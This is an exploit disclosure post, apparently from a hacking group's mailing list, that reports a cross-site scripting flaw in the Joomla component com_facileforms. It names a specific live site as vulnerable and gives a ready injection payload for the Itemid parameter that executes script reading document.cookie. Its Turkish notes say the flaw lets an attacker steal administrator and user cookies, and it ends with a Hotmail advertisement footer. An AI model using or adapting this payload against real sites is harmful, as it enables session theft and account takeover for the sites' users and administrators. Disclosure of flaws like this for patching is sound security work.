< ------------------- header data start ------------------- > ########################################################################### Joomla Component com_facileforms Cross Site Scripting Vulnerabilities ########################################################################### # Author : Pyske # Greetz : Fl0riX , M-K-A , F0RTS3V3N , 3KB3R ,system-Hacker ,HeroTurK ,fireofdevil and ALL Cyber-Warrior # Name : com_facileforms # Bug Type : Cross Site Scripting # Infection : Ynetici ve User cookiekleri calinabilir. # Bug Fix Advice : Zararl? karakterler filtrelenmelidir. # Demo Vuln. : http://mine.com.tr/index.php?option=com_facileforms&Itemid=[XSS CODE] ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > index.php?option=com_facileforms&Itemid="><script>alert(document.cookie)</script> < -- bug code end of -- > ? _________________________________________________________________ Windows Live Hotmail: Arkadalar?n?z Facebook'taki gncellemelerinizi do?rudan Hotmail?'den al?r. http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009